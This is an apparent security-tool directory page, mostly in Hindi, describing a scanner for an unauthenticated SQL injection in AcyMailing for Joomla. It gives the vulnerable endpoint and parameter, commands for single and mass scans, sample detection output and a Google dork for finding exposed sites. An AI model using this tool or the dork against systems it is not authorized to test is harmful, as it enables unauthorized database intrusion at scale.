Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-56292-AcyMailing-SQLi — CVE-2026-56292 - AcyMailing for Joomla अनधिकृत SQL इंजेक्शन स्कैनर | Kitploit
उपकरण/GitHubGitHub/nullwhisper/cve-2026-56292-acymailing-sqli
भेद्यता स्कैनरवेब भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubnullwhisper/cve-2026-56292-acymailing-sqli

CVE-2026-56292-AcyMailing-SQLi

CVE-2026-56292 - AcyMailing for Joomla अनधिकृत SQL इंजेक्शन स्कैनर

रिपॉजिटरी देखें
21228 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-56292 — AcyMailing for Joomla बिना प्रमाणीकरण के SQL इंजेक्शन

लेखक: nullwhisper
केवल अधिकृत सुरक्षा अनुसंधान / भेद्यता सत्यापन के लिए।

AcyMailing for Joomla public front-end task frontentityselect::loadEntityFront को उजागर करता है। पुराने संस्करणों में columns पैरामीटर बिना sanitization के सीधे SQL क्वेरी में डाल दिया जाता है। पैच किए गए संस्करण acym_secureDBColumn() का उपयोग करते हैं और ... not secured जैसी त्रुटि लौटाते हैं।

  • CVE: CVE-2026-56292
  • उत्पाद: AcyMailing for Joomla
  • एंडपॉइंट: index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFront
  • पैरामीटर: columns
  • प्रकार: बिना प्रमाणीकरण के SQL इंजेक्शन

फ़ाइलें

root@kitploit:~
.
├── cve_2026_56292_acymailing_sqli.py   # single + mass scanner
├── dorks.txt                             # google dorks
├── TECHNICAL.md                          # technical write-up
├── requirements.txt
├── LICENSE
└── README.md

इंस्टॉल

root@kitploit:~
pip3 install -r requirements.txt

उपयोग

एकल लक्ष्य:

root@kitploit:~
python3 cve_2026_56292_acymailing_sqli.py -u http://target/

सामूहिक स्कैन:

root@kitploit:~
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt

विकल्प:

root@kitploit:~
-u URL          single target
-l LIST         target list file
-t TIMEOUT      request timeout (default 30)
-T THREADS      concurrent threads (default 10)
-o OUTPUT       output file for vulnerable targets
-v              verbose
--proxy PROXY   http/https proxy
--patched-output FILE
--error-output FILE

localhost पर सत्यापित

AcyMailing v11.0.3 इंस्टॉल के विरुद्ध स्थानीय Joomla 5 लैब (vulnerable simulation mode) में परीक्षण किया गया।

root@kitploit:~
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204

[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1

Google Dorks

dorks.txt देखें। प्राथमिक dork:

root@kitploit:~
inurl:"index.php?option=com_acym"

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान के लिए है। इसका उपयोग उन प्रणालियों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास नहीं है। लेखक (nullwhisper) इस कोड के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

लाइसेंस

MIT — LICENSE देखें।

टूल डाउनलोड करें